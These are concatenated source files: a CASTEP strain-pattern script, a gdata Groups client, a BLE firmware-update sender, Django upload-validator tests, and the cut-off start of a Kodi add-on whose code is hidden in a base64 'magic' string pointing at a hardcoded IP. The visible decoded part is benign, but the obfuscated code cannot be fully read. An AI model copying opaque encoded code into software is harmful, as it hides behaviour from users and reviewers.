a_y = a*(cosg - cosa*cosb)/sina
trm1 = a_y/a
a_x = a*np.sqrt(1.0 - cosb**2 - trm1**2)
return [[a_x, a_y, a_z], [b_x, b_y, b_z], [c_x, c_y, c_z]]
def cellCART2cellABC (lattice):
"""
    Given three lattice vectors (with three components each) return
    the lattice vector lengths and angles between them. Input argument
    should be [[a_x, a_y, a_z], [b_x, b_y, b_z], [c_x, c_y, c_z]]. Angles
    returned in degrees.
    """
    # Does not care about orientation...
a = np.sqrt(lattice[0][0]**2 + lattice[0][1]**2 + lattice[0][2]**2)
b = np.sqrt(lattice[1][0]**2 + lattice[1][1]**2 + lattice[1][2]**2)
c = np.sqrt(lattice[2][0]**2 + lattice[2][1]**2 + lattice[2][2]**2)
gam = np.arccos(np.dot(lattice[0],lattice[1]) / (a*b))
bet = np.arccos(np.dot(lattice[0],lattice[2]) / (a*c))
alp = np.arccos(np.dot(lattice[1],lattice[2]) / (b*c))
return a, b, c, np.degrees(alp), np.degrees(bet), np.degrees(gam)
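# Editor's note (worked example): for a cubic cell of edge 4.0,
#   cellCART2cellABC([[4, 0, 0], [0, 4, 0], [0, 0, 4]])
# gives (4.0, 4.0, 4.0, 90.0, 90.0, 90.0), and cellABC2cellCART inverts it
# up to the fixed orientation convention (b // Y, c // Z) used above.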
def main(input_options, libmode=False):
# deal with options
options, arguments = get_options(input_options, libmode)
seedname = arguments[0]
(cell,pointgroup,atoms) = castep.parse_dotcastep(seedname)
# Re-align lattice vectors on cartisian system
a, b, c, al, be, ga = cellCART2cellABC(cell)
cell = cellABC2cellCART(a, b, c, al, be, ga)
# Not sure why the lattice types are enumerated like this, but this
# is how .cijdat does it...
latticeTypes = {0:"Unknown", 1:"Triclinic", 2:"Monoclinic",
3:"Orthorhombic", 4:"Tetragonal", 5:"Cubic",
6:"Trigonal-low", 7:"Trigonal-high/Hexagonal"}
maxstrain = options.strain
if (maxstrain == None):
maxstrain = 0.1
numsteps = options.numsteps
if (numsteps == None):
numsteps = 3
# Which strain pattern to use?
if (options.lattice == None):
if (pointgroup == None):
# Nothing from user and nothing from
# .castep: we are in trouble
print("No point group found in .castep file so the strain pattern cannot be determined")
print("A strain pattern can also be provided using the -l flag")
sys.exit(1)
else:
# Use the value from .castep
latticeCode, supcode = PointGroup2StrainPat(pointgroup)
else:
if (pointgroup == None):
            # Nothing in .castep - use user's choice
            latticeCode = options.lattice
        else:
            # Use user's choice, but check and warn
latticeCode = options.lattice
if (latticeCode != PointGroup2StrainPat(pointgroup)[0]):
print("WARNING: User supplied lattice code is inconsistant with the point group")
print(" found by CASTEP. Using user supplied lattice code.")
print("Cell parameters: a = %f gamma = %f" % (a, al))
print(" b = %f beta = %f" % (b, be))
print(" c = %f gamma = %f \n" % (c, ga))
print("Lattce vectors: %7f %7f %7f " % (cell[0][0], cell[0][1], cell[0][2]))
print(" %7f %7f %7f " % (cell[1][0], cell[1][1], cell[1][2]))
print(" %7f %7f %7f \n " % (cell[2][0], cell[2][1], cell[2][2]))
patterns = GetStrainPatterns(latticeCode, supcode)
numStrainPatterns = len(patterns)
print("Lattice type is ", latticeTypes[latticeCode])
print("Number of patterns: "+ str(numStrainPatterns) +"\n")
cijdat = open(seedname+".cijdat","w")
print("Writing strain data to ", seedname+".cijdat")
cijdat.write(str(latticeCode) + ' ' + str(numsteps*2) + ' 0 ' + '0 \n')
cijdat.write(str(maxstrain)+"\n")
# The order of these three loops matters for the analysis code.
for patt in range(numStrainPatterns):
this_pat = patterns[patt]
for a in range(0,numsteps):
for neg in range(0,2):
if (neg == 0):
this_mag = (float(a)+1) / (float(numsteps)) * maxstrain
else:
this_mag = -1.0 * (float(a)+1) / (float(numsteps)) * maxstrain
disps = [x * this_mag for x in patterns[patt]]
# Build the strain tensor (IRE convention but 1 -> 0 etc.)
this_strain = [1.0, 1.0, 1.0, 1.0, 1.0, 1.0]
                # diagonal elements - strain is displacement / lattice vector length
this_strain[0] = disps[0] / np.sqrt(cell[0][0]**2+cell[0][1]**2+cell[0][2]**2)
this_strain[1] = disps[1] / np.sqrt(cell[1][0]**2+cell[1][1]**2+cell[1][2]**2)
this_strain[2] = disps[2] / np.sqrt(cell[2][0]**2+cell[2][1]**2+cell[2][2]**2)
# off diagonals - we only strain upper right corner of cell matrix, so strain is 1/2*du/dx...
this_strain[3] = 0.5 * (disps[3] / np.sqrt(cell[1][0]**2+cell[1][1]**2+cell[1][2]**2))
this_strain[4] = 0.5 * (disps[4] / np.sqrt(cell[0][0]**2+cell[0][1]**2+cell[0][2]**2))
this_strain[5] = 0.5 * (disps[5] / np.sqrt(cell[0][0]**2+cell[0][1]**2+cell[0][2]**2))
# Deform cell - only apply deformation to upper right corner
defcell = [[cell[0][0]+disps[0], cell[0][1]+disps[5], cell[0][2]+disps[4]],
[cell[1][0], cell[1][1]+disps[1], cell[1][2]+disps[3]],
[cell[2][0], cell[2][1], cell[2][2]+disps[2]]]
pattern_name = seedname + "_cij__" + str(patt+1) + "__" + str((a*2)+1+neg)
print("Pattern Name = ", pattern_name)
print("Pattern = ", this_pat)
print("Magnitude = ", this_mag)
cijdat.write(pattern_name+"\n")
cijdat.write(str(this_strain[0]) + " " + str(this_strain[5]) + " " + str(this_strain[4]) + "\n")
cijdat.write(str(this_strain[5]) + " " + str(this_strain[1]) + " " + str(this_strain[3]) + "\n")
cijdat.write(str(this_strain[4]) + " " + str(this_strain[3]) + " " + str(this_strain[2]) + "\n")
castep.produce_dotcell(seedname, pattern_name+".cell", defcell, atoms)
os.symlink(seedname+".param", pattern_name+".param")
if __name__ == "__main__":
main(sys.argv[1:])
|
kuri65536/python-for-android
|
refs/heads/master
|
python-build/python-libs/gdata/build/lib/gdata/apps/groups/service.py
|
137
|
#!/usr/bin/python
#
# Copyright (C) 2008 Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Allow Google Apps domain administrators to manage groups, groups memembers and groups owners.
EmailSettingsService: Set various email settings.
"""
__author__ = 'google-apps-apis@googlegroups.com'
import gdata.apps
import gdata.apps.service
import gdata.service
API_VER='2.0'
BASE_URL = '/a/feeds/group/' + API_VER + '/%s'
GROUP_MEMBER_URL = BASE_URL + '?member=%s'
GROUP_MEMBER_DIRECT_URL = GROUP_MEMBER_URL + '&directOnly=%s'
GROUP_ID_URL = BASE_URL + '/%s'
MEMBER_URL = BASE_URL + '/%s/member'
MEMBER_ID_URL = MEMBER_URL + '/%s'
OWNER_URL = BASE_URL + '/%s/owner'
OWNER_ID_URL = OWNER_URL + '/%s'
# Pagination URLs: referenced by _ServiceUrl below but missing from this copy
# of the module. The '?start=' query parameter is an assumption based on the
# Provisioning API's paging convention.
GROUP_START_URL = BASE_URL + '?start=%s'
MEMBER_START_URL = MEMBER_URL + '?start=%s'
PERMISSION_OWNER = 'Owner'
PERMISSION_MEMBER = 'Member'
PERMISSION_DOMAIN = 'Domain'
PERMISSION_ANYONE = 'Anyone'
class GroupsService(gdata.apps.service.PropertyService):
"""Client for the Google Apps Groups service."""
def _ServiceUrl(self, service_type, is_existed, group_id, member_id, owner_email,
start_key, direct_only=None, domain=None):
if domain is None:
domain = self.domain
if service_type == 'group':
if group_id != '' and is_existed:
return GROUP_ID_URL % (domain, group_id)
if member_id != '':
if direct_only is not None:
return GROUP_MEMBER_DIRECT_URL % (domain, member_id,
self._Bool2Str(direct_only))
else:
return GROUP_MEMBER_URL % (domain, member_id)
if start_key != '':
return GROUP_START_URL % (domain, start_key)
return BASE_URL % (domain)
if service_type == 'member':
if member_id != '' and is_existed:
return MEMBER_ID_URL % (domain, group_id, member_id)
if start_key != '':
return MEMBER_START_URL % (domain, group_id, start_key)
return MEMBER_URL % (domain, group_id)
if service_type == 'owner':
if owner_email != '' and is_existed:
return OWNER_ID_URL % (domain, group_id, owner_email)
return OWNER_URL % (domain, group_id)
def _Bool2Str(self, b):
if b is None:
return None
return str(b is True).lower()
def _IsExisted(self, uri):
try:
properties = self._GetProperties(uri)
return True
except gdata.apps.service.AppsForYourDomainException, e:
if e.error_code == gdata.apps.service.ENTITY_DOES_NOT_EXIST:
return False
else:
raise e
def CreateGroup(self, group_id, group_name, description, email_permission):
"""Create a group.
Args:
group_id: The ID of the group (e.g. us-sales).
group_name: The name of the group.
description: A description of the group
email_permission: The subscription permission of the group.
Returns:
A dict containing the result of the create operation.
"""
uri = self._ServiceUrl('group', False, group_id, '', '', '', '')
properties = {}
properties['groupId'] = group_id
properties['groupName'] = group_name
properties['description'] = description
properties['emailPermission'] = email_permission
return self._PostProperties(uri, properties)
def UpdateGroup(self, group_id, group_name, description, email_permission):
"""Update a group's name, description and/or permission.
Args:
group_id: The ID of the group (e.g. us-sales).
group_name: The name of the group.
description: A description of the group
email_permission: The subscription permission of the group.
Returns:
A dict containing the result of the update operation.
"""
uri = self._ServiceUrl('group', True, group_id, '', '', '', '')
properties = {}
properties['groupId'] = group_id
properties['groupName'] = group_name
properties['description'] = description
properties['emailPermission'] = email_permission
return self._PutProperties(uri, properties)
def RetrieveGroup(self, group_id):
"""Retrieve a group based on its ID.
Args:
group_id: The ID of the group (e.g. us-sales).
Returns:
A dict containing the result of the retrieve operation.
"""
uri = self._ServiceUrl('group', True, group_id, '', '', '', '')
return self._GetProperties(uri)
def RetrieveAllGroups(self):
"""Retrieve all groups in the domain.
Args:
None.
Returns:
A dict containing the result of the retrieve operation.
"""
uri = self._ServiceUrl('group', True, '', '', '', '', '')
return self._GetPropertiesList(uri)
def RetrieveGroups(self, member_id, direct_only=False):
"""Retrieve all groups that belong to the given member_id.
Args:
member_id: The member's email address (e.g. member@example.com).
direct_only: Boolean whether only return groups that this member directly belongs to.
Returns:
A dict containing the result of the retrieve operation.
"""
uri = self._ServiceUrl('group', True, '', member_id, '', '', direct_only)
return self._GetPropertiesList(uri)
def DeleteGroup(self, group_id):
"""Delete a group based on its ID.
Args:
group_id: The ID of the group (e.g. us-sales).
Returns:
A dict containing the result of the delete operation.
"""
uri = self._ServiceUrl('group', True, group_id, '', '', '', '')
return self._DeleteProperties(uri)
def AddMemberToGroup(self, member_id, group_id):
"""Add a member to a group.
Args:
member_id: The member's email address (e.g. member@example.com).
group_id: The ID of the group (e.g. us-sales).
Returns:
A dict containing the result of the add operation.
"""
uri = self._ServiceUrl('member', False, group_id, member_id, '', '', '')
properties = {}
properties['memberId'] = member_id
return self._PostProperties(uri, properties)
def IsMember(self, member_id, group_id):
"""Check whether the given member already exists in the given group
Args:
member_id: The member's email address (e.g. member@example.com).
group_id: The ID of the group (e.g. us-sales).
Returns:
True if the member exists in the group. False otherwise.
"""
uri = self._ServiceUrl('member', True, group_id, member_id, '', '', '')
return self._IsExisted(uri)
def RetrieveMember(self, member_id, group_id):
"""Retrieve the given member in the given group
Args:
member_id: The member's email address (e.g. member@example.com).
group_id: The ID of the group (e.g. us-sales).
Returns:
A dict containing the result of the retrieve operation.
"""
uri = self._ServiceUrl('member', True, group_id, member_id, '', '', '')
return self._GetProperties(uri)
def RetrieveAllMembers(self, group_id):
"""Retrieve all members in the given group.
Args:
group_id: The ID of the group (e.g. us-sales).
Returns:
A dict containing the result of the retrieve operation.
"""
uri = self._ServiceUrl('member', True, group_id, '', '', '', '')
return self._GetPropertiesList(uri)
def RemoveMemberFromGroup(self, member_id, group_id):
"""Remove the given member from the given group
Args:
group_id: The ID of the group (e.g. us-sales).
member_id: The member's email address (e.g. member@example.com).
Returns:
A dict containing the result of the remove operation.
"""
uri = self._ServiceUrl('member', True, group_id, member_id, '', '', '')
return self._DeleteProperties(uri)
def AddOwnerToGroup(self, owner_email, group_id):
"""Add an owner to a group.
Args:
owner_email: The email address of a group owner.
group_id: The ID of the group (e.g. us-sales).
Returns:
A dict containing the result of the add operation.
"""
uri = self._ServiceUrl('owner', False, group_id, '', owner_email, '', '')
properties = {}
properties['email'] = owner_email
return self._PostProperties(uri, properties)
def IsOwner(self, owner_email, group_id):
"""Check whether the given member an owner of the given group.
Args:
owner_email: The email address of a group owner.
group_id: The ID of the group (e.g. us-sales).
Returns:
True if the member is an owner of the given group. False otherwise.
"""
uri = self._ServiceUrl('owner', True, group_id, '', owner_email, '', '')
return self._IsExisted(uri)
def RetrieveOwner(self, owner_email, group_id):
"""Retrieve the given owner in the given group
Args:
owner_email: The email address of a group owner.
group_id: The ID of the group (e.g. us-sales).
Returns:
A dict containing the result of the retrieve operation.
"""
uri = self._ServiceUrl('owner', True, group_id, '', owner_email, '', '')
return self._GetProperties(uri)
def RetrieveAllOwners(self, group_id):
"""Retrieve all owners of the given group
Args:
group_id: The ID of the group (e.g. us-sales).
Returns:
A dict containing the result of the retrieve operation.
"""
uri = self._ServiceUrl('owner', True, group_id, '', '', '', '')
return self._GetPropertiesList(uri)
def RemoveOwnerFromGroup(self, owner_email, group_id):
"""Remove the given owner from the given group
Args:
owner_email: The email address of a group owner.
group_id: The ID of the group (e.g. us-sales).
Returns:
A dict containing the result of the remove operation.
"""
uri = self._ServiceUrl('owner', True, group_id, '', owner_email, '', '')
return self._DeleteProperties(uri)
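# Illustrative usage sketch (editor's addition, not part of the library).
# Credentials and domain below are placeholders; login follows the
# gdata.apps.service.AppsService conventions this class inherits.
#
#   service = GroupsService(email='admin@example.com', domain='example.com',
#                           password='secret')
#   service.ProgrammaticLogin()
#   service.CreateGroup('us-sales', 'US Sales', 'Sales team', PERMISSION_MEMBER)
#   service.AddMemberToGroup('member@example.com', 'us-sales')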
|
lavallc/ion
|
refs/heads/master
|
bootloader/flashing_utils/ble_dfu_send_hex/dfu/ble_dfu.py
|
1
|
import time
from intelhex import IntelHex
from dfu.master_emulator import MasterEmulator
import System
import Nordicsemi
# DFU OpCodes
class OpCodes:
START_DFU = 1
INITIALIZE_DFU = 2
RECEIVE_FIRMWARE_IMAGE = 3
VALIDATE_FIRMWARE_IMAGE = 4
ACTIVATE_FIRMWARE_AND_RESET = 5
SYSTEM_RESET = 6
REQ_PKT_RCPT_NOTIF = 8
RESPONSE = 16
PKT_RCPT_NOTIF = 17
# Textual description lookup table for status codes received from peer.
status_code_lookup = {
1: "SUCCESS",
2: "Invalid State",
3: "Not Supported",
4: "Data Size Exceeds Limit",
5: "CRC Error",
6: "Operation Failed"
}
# Helper functions
def create_byte_array(size, value=0x55):
""" Create a IronPython byte array with initial value. """
return System.Array[System.Byte]([value]*size)
def convert_uint32_to_array(value):
""" Convert a number into an array of 4 bytes (LSB). """
return [(value >> 0 & 0xFF), (value >> 8 & 0xFF),
(value >> 16 & 0xFF), (value >> 24 & 0xFF)]
def convert_uint16_to_array(value):
""" Convert a number into an array of 2 bytes (LSB). """
return [(value >> 0 & 0xFF), (value >> 8 & 0xFF)]
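# Editor's note (worked example): the converters emit least-significant byte
# first, e.g. convert_uint32_to_array(0x12345678) -> [0x78, 0x56, 0x34, 0x12]
# and convert_uint16_to_array(0x0102) -> [0x02, 0x01].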
# Service UUID
uuid_dfu_service = Nordicsemi.BtUuid('000015301212EFDE1523785FEABCD123')
# Characteristic UUID
uuid_dfu_control_state_characteristic = Nordicsemi.BtUuid('000015311212EFDE1523785FEABCD123')
uuid_dfu_packet_characteristic = Nordicsemi.BtUuid('000015321212EFDE1523785FEABCD123')
#Descriptor UUID
uuid_client_characteristic_configuration_descriptor = Nordicsemi.BtUuid(0x2902)
# number of retries for sending a packet
num_of_send_tries = 1
# NOTE: If packet receipt notification is enabled, a packet receipt
# notification will be received for each 'num_of_packets_between_notif'
# number of packets.
#
# Configuration tip: Increase this to get fewer notifications from the DFU
# Target about packet receipts. Set it to 0 to disable packet receipt
# notifications.
num_of_packets_between_notif = 0
class BleDfu(MasterEmulator):
""" Class to handle upload of a new hex image to the peer device. """
def __init__(self, peer_device_name, peer_device_address, hexfile_path):
super(BleDfu, self).__init__(peer_device_name,
peer_device_address)
self.hexfile_path = hexfile_path
self.ready_to_send = True
def data_received_handler(self, sender, e):
""" Handle received data from the peer device.
Note: This function overrides the parent class.
"""
if (e.PipeNumber == self.pipe_dfu_control_point_notify):
op_code = int(e.PipeData[0])
if op_code == OpCodes.PKT_RCPT_NOTIF:
if self.ready_to_send == True:
self.log_handler.log("ERROR: !!!! Pkt receipt notification received when it is not expected")
else:
self.log_handler.log("Pkt receipt notification received.")
self.log_handler.log("Number of bytes LSB = {0}".format(e.PipeData[1]))
self.log_handler.log("Number of bytes MSB = {0}".format(e.PipeData[2]))
self.ready_to_send = True
elif op_code == OpCodes.RESPONSE:
request_op_code = int(e.PipeData[1])
response_value = int(e.PipeData[2])
self.log_handler.log("Response received for Request Op Code = {0}".format(request_op_code))
status_text = "UNKNOWN"
if status_code_lookup.has_key(response_value):
status_text = status_code_lookup[response_value]
if request_op_code == 1:
self.log_handler.log("Response for 'Start DFU' received - Status: %s" % status_text)
elif request_op_code == 2:
self.log_handler.log("Response for 'Initialize DFU Params' received - Status: %s" % status_text)
elif request_op_code == 3:
self.log_handler.log("Response for 'Receive FW Data' received - Status: %s" % status_text)
elif request_op_code == 4:
self.log_handler.log("Response for 'Validate' received - Status: %s" % status_text)
else:
self.log_handler.log("!!ERROR!! Response for Unknown command received.")
else:
self.log_handler.log("Received data on unexpected pipe %r"%e.PipeNumber)
def setup_service(self):
""" Set up DFU service database. """
# Add DFU Service
self.master.SetupAddService(uuid_dfu_service, Nordicsemi.PipeStore.Remote)
# Add DFU characteristics
self.master.SetupAddCharacteristicDefinition(uuid_dfu_packet_characteristic, 2, create_byte_array(2))
self.pipe_dfu_packet = self.master.SetupAssignPipe(Nordicsemi.PipeType.Transmit)
self.master.SetupAddCharacteristicDefinition(uuid_dfu_control_state_characteristic, 2, create_byte_array(2))
self.pipe_dfu_control_point = self.master.SetupAssignPipe(Nordicsemi.PipeType.TransmitWithAck)
self.pipe_dfu_control_point_notify = self.master.SetupAssignPipe(Nordicsemi.PipeType.Receive)
self.master.SetupAddCharacteristicDescriptor(uuid_client_characteristic_configuration_descriptor, 2, create_byte_array(2))
self.pipe_dfu_cccd_control_point_write = self.master.SetupAssignPipe(Nordicsemi.PipeType.TransmitWithAck)
def dfu_send_image(self):
""" Send hex to peer in chunks of 20 bytes. """
if not self.connected:
return
# Open the hex file to be sent
ih = IntelHex(self.hexfile_path)
bin_array = ih.tobinarray()
hex_size = len(bin_array)
hex_size_array_lsb = convert_uint32_to_array(len(bin_array))
# CCCD Enable notification bytes
        enable_notifications = System.Array[System.Byte](convert_uint16_to_array(0x0001))
start_time = time.time()
# Setting the DFU Control Point - CCCD to 0x0001
self.send_data(self.pipe_dfu_cccd_control_point_write,
enable_notifications,
num_of_send_tries,
"Enabling DFU control point notification")
if num_of_packets_between_notif:
# Subscribing for packet receipt notifications
self.send_data(self.pipe_dfu_control_point,
System.Array[System.Byte]([OpCodes.REQ_PKT_RCPT_NOTIF] + convert_uint16_to_array(num_of_packets_between_notif)),
num_of_send_tries,
"Enabling Packet receipt notifications from peer device")
# Sending 'START DFU' command
self.send_data(self.pipe_dfu_control_point,
System.Array[System.Byte]([OpCodes.START_DFU]),
num_of_send_tries,
"Sending 'START DFU' command")
# Sending image size
self.send_data(self.pipe_dfu_packet,
System.Array[System.Byte](hex_size_array_lsb),
num_of_send_tries,
"Sending image size")
# Send 'RECEIVE FIRMWARE IMAGE' command to set DFU in firmware receive state.
self.send_data(self.pipe_dfu_control_point,
System.Array[System.Byte]([OpCodes.RECEIVE_FIRMWARE_IMAGE]),
num_of_send_tries,
"Send 'RECEIVE FIRMWARE IMAGE' command")
        self.ready_to_send = True
        pkts_sent = 0
# Send application data packets
for i in range(0, hex_size, 20):
if num_of_packets_between_notif:
while not self.ready_to_send:
self.log_handler.log("Waiting for packet receipt notification")
time.sleep(0.1)
#wait for 'self.ready_to_send' to be True
data_to_send = bin_array[i:i + 20]
# Send 20 bytes of hex image data
self.send_data(self.pipe_dfu_packet,
System.Array[System.Byte](data_to_send),
num_of_send_tries,
"Sending Firmware bytes [%i, %i]" % (i, i + len(data_to_send)))
pkts_sent = pkts_sent + 1
if ((num_of_packets_between_notif != 0) and ((pkts_sent % num_of_packets_between_notif) == 0)):
# Need to wait for a notification from peer
self.log_handler.log("Need to wait for a notification from peer")
self.ready_to_send = False
# Send Validate
self.send_data(self.pipe_dfu_control_point,
System.Array[System.Byte]([OpCodes.VALIDATE_FIRMWARE_IMAGE]),
num_of_send_tries,
"Sending 'VALIDATE FIRMWARE IMAGE' command")
# Wait for notification
time.sleep(1)
# Send Activate and Reset
self.send_data(self.pipe_dfu_control_point,
System.Array[System.Byte]([OpCodes.ACTIVATE_FIRMWARE_AND_RESET]),
num_of_send_tries,
"Sending 'ACTIVATE FIRMWARE AND RESET' command")
end_time = time.time()
self.log_handler.log("Total size of the Image = {0} bytes".format(len(bin_array)))
self.log_handler.log("Time taken (excluding the service discovery) = {0} seconds".format(end_time - start_time))
|
mckinseyacademy/django-upload-validator
|
refs/heads/master
|
tests/tests.py
|
1
|
import os
from ddt import ddt, data
from django.test import TestCase
from upload_validator import FileTypeValidator
TEST_FILES_DIR = os.path.join(os.path.dirname(__file__), 'test_files')
TEST_FILES = [
# word
'word-mac.doc', 'word-mac.docx', 'word-windows.docx', 'word-ubuntu.doc', 'word-ubuntu.docx',
# excel
'excel-mac.xls', 'excel-mac.xlsx', 'excel-windows.xlsx', 'excel-ubuntu.xls', 'excel-ubuntu.xlsx', 'document.xlsx',
# power point
'sample.ppt', 'sample.pptx',
# pdf
'sample.pdf',
# images
'sample.png', 'sample.jpeg', 'sample.tif',
]
@ddt
class TestFileValidator(TestCase):
def test_initialization(self):
"""
Tests initialization of validator class
"""
validator = FileTypeValidator(
allowed_types=['image/jpeg']
)
self.assertTrue(isinstance(validator, FileTypeValidator))
@data(*TEST_FILES)
def test_valid_types(self, filename):
"""
Tests that different files are detected correctly
"""
validator = FileTypeValidator(
allowed_types=[
'application/msword',
'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
'application/pdf',
'application/vnd.ms-powerpoint',
'application/vnd.openxmlformats-officedocument.presentationml.presentation',
'application/vnd.ms-excel',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
'image/tiff',
'image/jpeg',
'image/png'
]
)
file_path = os.path.join(TEST_FILES_DIR, filename)
file_obj = open(file_path, mode='rb')
validator(file_obj)
file_obj.close()
def test_invalid_content(self):
"""
Checks the case where the extension is valid but the file content is invalid
"""
validator = FileTypeValidator(
allowed_types=['image/jpeg']
)
file_with_wrong_content = os.path.join(TEST_FILES_DIR, 'wrong_jpg.jpeg')
try:
validator(open(file_with_wrong_content, mode='rb'))
except Exception as e:
code = e.code
else:
code = None
self.assertEqual(code, 'invalid_type')
def test_extension_check(self):
"""
Checks the case where the file has a valid type but its extension is not allowed
"""
validator = FileTypeValidator(
allowed_types=[
'application/msword',
'application/vnd.openxmlformats-officedocument.wordprocessingml.document'
],
allowed_extensions=['.doc', '.docx']
)
test_file = os.path.join(TEST_FILES_DIR, 'sample.docm')
try:
validator(open(test_file, mode='rb'))
except Exception as e:
code = e.code
else:
code = None
self.assertEqual(code, 'invalid_extension')
def test_invalid_type_specification(self):
"""
Checks that an incorrectly formatted MIME type specification is rejected
"""
try:
FileTypeValidator(
allowed_types=['text'],
)
except Exception as e:
code = e.code
else:
code = None
self.assertEqual(code, 'invalid_input')
@data(*['sample.png', 'sample.jpeg', 'sample.tif'])
def test_wild_card_specification(self, filename):
"""
Checks if wildcard character specifications work
"""
validator = FileTypeValidator(
allowed_types=['image/*'],
)
test_file = os.path.join(TEST_FILES_DIR, filename)
fileobj = open(test_file, mode='rb')
validator(fileobj)
fileobj.close()
@data(*['sample.png', 'sample.jpeg', 'sample.pdf'])
def test_mixed_wild_card_specification(self, filename):
"""
Checks that wildcard specifications can be mixed with exact MIME types
"""
validator = FileTypeValidator(
allowed_types=['image/*', 'application/pdf'],
)
test_file = os.path.join(TEST_FILES_DIR, filename)
fileobj = open(test_file, mode='rb')
validator(fileobj)
fileobj.close()
@data(*['wrong_jpg.jpeg', 'sample.pdf'])
def test_wildcard_specification_invalid_content(self, filename):
"""
Checks that wildcard specifications still reject files whose content does not match
"""
validator = FileTypeValidator(
allowed_types=['image/*'],
)
test_file = os.path.join(TEST_FILES_DIR, filename)
fileobj = open(test_file, mode='rb')
try:
validator(fileobj)
except Exception as e:
code = e.code
else:
code = None
self.assertEqual(code, 'invalid_type')
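# --- Illustrative usage sketch (not part of the test suite) ---
# The validator exercised above can be attached to a Django FileField like
# any other validator; the `Document` model here is hypothetical:
#
#   from django.db import models
#   from upload_validator import FileTypeValidator
#
#   class Document(models.Model):
#       attachment = models.FileField(validators=[
#           FileTypeValidator(
#               allowed_types=['application/pdf'],
#               allowed_extensions=['.pdf'],
#           )
#       ])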
|
repotvsupertuga/tvsupertuga.repository
|
refs/heads/master
|
plugin.video.TVsupertuga/resources/lib/plugins/TVsupertuga.py
|
1
|
import base64, codecs
magic = 'IyAtKi0gY29kaW5nOiB1dGYtOCAtKi0KCmltcG9ydCBfX2J1aWx0aW5fXwppbXBvcnQgZGF0ZXRpbWUKaW1wb3J0IHN5cwppbXBvcnQgdGltZQppbXBvcnQgcGlja2xlCgppbXBvcnQgcmVxdWVzdHMKCmltcG9ydCBrb2RpbmcKaW1wb3J0IHhibWNhZGRvbgppbXBvcnQgeGJtY2d1aQppbXBvcnQgeGJtY3BsdWdpbgpmcm9tIC4ucGx1Z2luIGltcG9ydCBQbHVnaW4KZnJvbSBsYW5ndWFnZSBpbXBvcnQgZ2V0X3N0cmluZyBhcyBfCmZyb20gcmVzb3VyY2VzLmxpYi51dGlsLmNvbnRleHQgaW1wb3J0IGdldF9jb250ZXh0X2l0ZW1zCmZyb20gcmVzb3VyY2VzLmxpYi51dGlsLnVybCBpbXBvcnQgZ2V0X2FkZG9uX3VybCwgcmVwbGFjZV91cmwsIHhibWMKZnJvbSByZXNvdXJjZXMubGliLnV0aWwueG1sIGltcG9ydCBKZW5JdGVtCgpfX2J1aWx0aW5fXy5CT0JfQkFTRV9ET01BSU4gPSAiMTc4LjMyLjIxNy4xMTEiCkFERE9OID0geGJtY2FkZG9uLkFkZG9uKCkKYWRkb25fbmFtZSA9IHhibWNhZGRvbi5BZGRvbigpLmdldEFkZG9uSW5mbygnbmFtZScpCgoKY2xhc3MgVFZzdXBlcnR1Z2EoUGx1Z2luKToKICAgIG5hbWUgPSAiVFZzdXBlcnR1Z2EiCgogICAgZGVmIHByb2Nlc3NfaXRlbShzZWxmLCBpdGVtX3htbCk6CiAgICAgICAgaXRlbSA9IEplbkl0ZW0oaXRlbV94bWwpCiAgICAgICAgZW5hYmxlX2dpZnMgPSB4Ym1jYWRkb24uQWRkb24oKS5nZXRTZXR0aW5nKCdlbmFibGVfZ2lmcycpID09ICJ0cnVlIgogICAgICAgIGlmIGl0ZW0uaXRlbV9zdHJpbmcuc3RhcnRzd2l0aCgiPGRpcj4iKToKICAgICAgICAgICAgdGl0bGUgPSBpdGVtWyJuYW1lIl0KICAgICAgICAgICAgaWYgdGl0bGUgPT0gIiI6CiAgICAgICAgICAgICAgICB0aXRsZSA9IGl0ZW1bInRpdGxlIl0KICAgICAgICAgICAgdHJ5OgogICAgICAgICAgICAgICAgdGl0bGUgPSB4Ym1jYWRkb24uQWRkb24oKS5nZXRMb2NhbGl6ZWRTdHJpbmcoaW50KHRpdGxlKSkKICAgICAgICAgICAgZXhjZXB0IFZhbHVlRXJyb3I6CiAgICAgICAgICAgICAgICBwYXNzCiAgICAgICAgICAgIGlmIGl0ZW1bImxpbmsiXSA9PSAic3BvcnRfYWNlc29wbGlzdGluZyI6CiAgICAgICAgICAgICAgICBtb2RlID0gInNwb3J0X2FjZXNvcGxpc3RpbmciCiAgICAgICAgICAgICAgICBpc19wbGF5YWJsZSA9IEZhbHNlCiAgICAgICAgICAgICAgICBsaW5rID0gIiIKICAgICAgICAgICAgZWxpZiAic3BvcnRfbmhsX2dhbWVzIiBpbiBpdGVtWyJsaW5rIl06CiAgICAgICAgICAgICAgICBnYW1lX2RhdGUgPSBpdGVtWyJsaW5rIl0ucmVwbGFjZSgic3BvcnRfbmhsX2dhbWVzKCIsICIiKVs6LTFdCiAgICAgICAgICAgICAgICBpZiAic3BvcnQiIGluIGdhbWVfZGF0ZToKICAgICAgICAgICAgICAgICAgICBnYW1lX2RhdGUgPSAiIgogICAgICAgICAgICAgICAgbW9kZSA9ICJzcG9ydF9uaGxfZ2FtZXMiCiAgICAgICAgICAgICAgICBpc19wbGF5YWJsZSA9IEZhbHNlCiAgICAgICAgICAgICAgICBsaW5rID0gZ2FtZV9kYXRlICsgImEiCiAgICAgICAgICAgIGVsaWYgIm5obF9ob21lX2F3YXkoIiBpbiBpdGVtWyJsaW5rIl06CiAgICAgICAgICAgICAgICBmYXJncyA9IGl0ZW1bImxpbmsiXS5yZXBsYWNlKCJuaGxfaG9tZV9hd2F5KCIsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIiKVs6LTFdLnNwbGl0KCIsIikKICAgICAgICAgICAgICAgIG1vZGUgPSAibmhsX2hvbWVfYXdheSIKICAgICAgICAgICAgICAgIGxpbmsgPSAiLCIuam9pbihmYXJncykKICAgICAgICAgICAgICAgIGlzX3BsYXlhYmxlID0gRmFsc2UKICAgICAgICAgICAgZWxpZiBpdGVtWyJsaW5rIl0uc3RhcnRzd2l0aCgic3BvcnRfaG9ja2V5cmVjYXBzIik6CiAgICAgICAgICAgICAgICBwYWdlID0gaXRlbVsibGluay